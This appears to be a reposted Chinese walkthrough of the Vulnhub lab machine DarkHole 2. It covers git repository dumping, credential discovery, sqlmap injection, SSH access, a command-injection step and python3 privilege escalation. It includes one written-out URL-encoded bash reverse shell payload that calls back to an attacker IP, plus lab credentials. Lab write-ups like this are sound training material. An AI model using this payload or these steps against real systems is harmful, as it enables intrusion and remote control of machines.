Vulnhub 靶场 DARKHOLE: 2
作者:互联网
Vulnhub 靶场 DARKHOLE: 2
一、前期准备
1.使用nmap对目标靶机进行扫描
发现开放了22和80端口,而且还有 Git repository。
2、80端口。
因为80端口有git仓库,那就把仓库转过来看看,使用git-dumper(从网站转储git存储库的工具。)
下载 git_dumper.py ,并赋权:
把目标靶机中的 git 仓库弄下来:
东西不少,找 log 看看:
看到login.php,访问试试。
需要邮箱和密码,看下缓存区:
发现了邮箱和密码,"lush@admin.com" - "321"。登陆一下:
二、漏洞利用
发现可能存在注入点,这里要加上cookie。
sqlmap跑一下。
发现了数据库,看一下 darkhole_2 库中的表:
查看ssh表中的数据。
发现账号密码,试着ssh登陆。
查看定时任务。
发现9999端口有一个服务。查看一下 /opt/web:
查看一下tcp进程。
发现在监听状态,尝试一下。
发现可以用,在cmd处写入shell,记得要 url 编码:
bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.147.190%2F1234%200%3E%261%27
攻击机监听1234端口,成功反弹shell,拿到losy用户。
查看了一番后,在家目录下的 .bash_history 文件中发现了 losy 的密码:
三、提权
在刚刚ssh登陆界面切换为losy用户。
发现 python3 随便用,那就简单了,直接用 python3 提权:
标签:发现,git,查看,losy,端口,DARKHOLE,Vulnhub,靶场,ssh 来源: https://www.cnblogs.com/2022zzt/p/16229091.html